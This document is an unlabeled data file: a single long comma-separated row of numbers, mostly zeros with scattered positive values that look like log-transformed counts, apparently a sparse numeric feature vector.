0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7369991058576035, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 2.6390573296152584, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.770684624465665, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 2.0794415416798357, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 10.163621819966615, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.203592144986466, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.26326207653313, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.160336650881089, 0.0, 0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.833213344056216, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.828313737302301, 0.0, 0.0, 3.1354942159291497, 0.0, 0.0, 7.97305546761269, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0, 4.748123315783209, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.532599493153256, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 4.825453896395787, 0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 3.800574088041945, 0.0, 0.0, 0.0, 1.3862943611198906, 1.791759469228055, 0.0, 0, 0.0, 3.044522437723423, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 6.976014914136014, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.9444389791664403, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.238324625039507, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 5.346437018291705, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.8858724694518925, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9957322735539913, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.5649493574615367, 0, 0.0, 2.6390573296152584, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.9957322735539913, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.8918202981106265, 0, 0.0, 0.0, 0.0, 4.8991863767100545, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 5.0301047650807, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 4.292158018817389, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 